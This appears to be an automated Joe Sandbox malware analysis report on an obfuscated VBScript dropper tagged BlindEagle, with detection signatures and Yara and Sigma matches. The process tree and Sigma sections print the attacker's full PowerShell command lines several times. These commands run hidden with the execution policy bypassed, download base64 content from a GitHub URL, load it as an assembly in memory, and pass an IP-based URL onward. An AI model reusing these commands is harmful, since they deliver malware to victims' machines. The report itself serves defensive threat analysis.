Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uLfuBVyZFV.vbs

Overview

General Information

Sample name:uLfuBVyZFV.vbs
renamed because original name is a hash value
Original sample name:79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a.vbs
Analysis ID:1523829
MD5:123316fb7db9c910bd92a9ad7e7bbdbc
SHA1:43dbabc790f0a0e20b397ad707bb33cb77004998
SHA256:79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6644 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2980INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x48c2f:$b3: ::UTF8.GetString(
  • 0x509cf:$b3: ::UTF8.GetString(
  • 0x50d49:$b3: ::UTF8.GetString(
  • 0x51ce6:$b3: ::UTF8.GetString(
  • 0x6d631:$b3: ::UTF8.GetString(
  • 0x720c7:$b3: ::UTF8.GetString(
  • 0x726b5:$b3: ::UTF8.GetString(
  • 0xa544e:$b3: ::UTF8.GetString(
  • 0xa5a3c:$b3: ::UTF8.GetString(
  • 0xc3880:$b3: ::UTF8.GetString(
  • 0xc3fc3:$b3: ::UTF8.GetString(
  • 0xc4a0e:$b3: ::UTF8.GetString(
  • 0xc5003:$b3: ::UTF8.GetString(
  • 0xc57aa:$b3: ::UTF8.GetString(
  • 0xc5f4a:$b3: ::UTF8.GetString(
  • 0xc672d:$b3: ::UTF8.GetString(
  • 0xc6da1:$b3: ::UTF8.GetString(
  • 0xc76cf:$b3: ::UTF8.GetString(
  • 0xc8f6b:$b3: ::UTF8.GetString(
  • 0xc9943:$b3: ::UTF8.GetString(
  • 0xca0e6:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 7304INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1e7fd7:$b2: ::FromBase64String(
  • 0x1eb230:$b2: ::FromBase64String(
  • 0x1eb408:$b2: ::FromBase64String(
  • 0x1eb5e0:$b2: ::FromBase64String(
  • 0x144903:$s1: -jOiN
  • 0x144d31:$s1: -jOiN
  • 0x148fc6:$s1: -jOiN
  • 0x151547:$s1: -jOiN
  • 0x1bbf0a:$s1: -jOiN
  • 0x1beb62:$s1: -jOiN
  • 0x201c1f:$s1: -join
  • 0x23dcbe:$s1: -join
  • 0x24184c:$s1: -join
  • 0x26222a:$s1: -jOiN
  • 0x26265f:$s1: -jOiN
  • 0x262cd2:$s1: -jOiN
  • 0x2632c2:$s1: -jOiN
  • 0x2657b5:$s1: -join
  • 0x265972:$s1: -join
  • 0x4edef1:$s1: -jOiN
  • 0x4ee31f:$s1: -jOiN

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64Strin
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnK
Sigma detected: Potential PowerShell Command Line Obfuscation
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnK
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnK
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 